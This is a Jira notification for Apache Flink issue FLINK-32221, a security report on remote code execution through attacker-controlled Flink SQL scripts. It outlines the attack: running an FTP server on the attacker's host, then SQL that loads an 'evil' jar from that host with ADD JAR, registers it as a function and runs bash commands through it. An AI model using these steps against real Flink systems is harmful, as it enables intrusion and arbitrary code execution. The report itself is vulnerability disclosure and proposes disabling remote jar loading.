[
https://issues.apache.org/jira/browse/FLINK-32221?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
gaoyu shi updated FLINK-32221:
------------------------------
Priority: Major (was: Critical)
> Attacker can achieve Remote Code Execution when they can control Flink SQL
> script content
> ------------------------------------------------------------------------------------------
>
> Key: FLINK-32221
> URL: https://issues.apache.org/jira/browse/FLINK-32221
> Project: Flink
> Issue Type: Bug
> Environment: all version that support SQL Script.
> Reporter: gaoyu shi
> Priority: Major
> Attachments: image-2023-05-31-14-58-21-800.png,
> image-2023-05-31-14-59-50-875.png
>
>
> Flink SQL script has similiar syntax with tradition SQL, which means it also
> suffer SQL injection vulnerbility.
> Attacker can achieve Remote Code Execution when they can control part of
> whole of the Flink SQL script content by following steps.
> 1. attacker develop an evil custom Scalar Function class and package it into
> jar.
> !image-2023-05-31-14-59-50-875.png|width=721,height=251!
> 2. run a ftp server on attacker host, and put the evil jar in it.
>
> {code:java}
> // install python-ftp-server tool
> pip install python-ftp-server
> // run ftp server
> python3 -m python_ftp_server -d . --ip <public interface ip> -p password
> // copy evil jar to current directory
> cp <evil.jar-path> .{code}
> 3. Input the Flink SQL script to trigger code execution, which assumes that
> the attacker can control part or whole of the Flink SQL script through SQL
> injection or other method.
>
>
> {code:java}
> // transfer the evil jar from attacker host to victim
> ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
> // register the evil function into the SQL context
> CREATE FUNCTION EVIL AS 'org.example.Evil';
> // run any bash command
> SELECT EVIL('<bash command>'); {code}
>
>
> In summary, this vulnerbility allows attacker get remote code execution
> through Flink SQL script. After looking at several websites that use flink,
> it is very common to concat user input into Flink SQL statements, or even
> directly allow users to enter arbitrary Flink SQL scripts to process data.
> I allow that it is not a vulnerability to execute malicious code through
> Flink's web interface to submit a malicious jar package, because developers
> will hide Flink's web interface by default, such as only listening to
> localhost. However, malicious code execution through Flink SQL scripts is
> completely different. Currently, there is no hardening method or default
> configuration that can prevent attackers from using Flink SQL to achieve
> arbitrary code execution.
> Suggestion:
> 'ADD JAR' command should not be able to load remote jar, or it should be
> disable by default at least.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
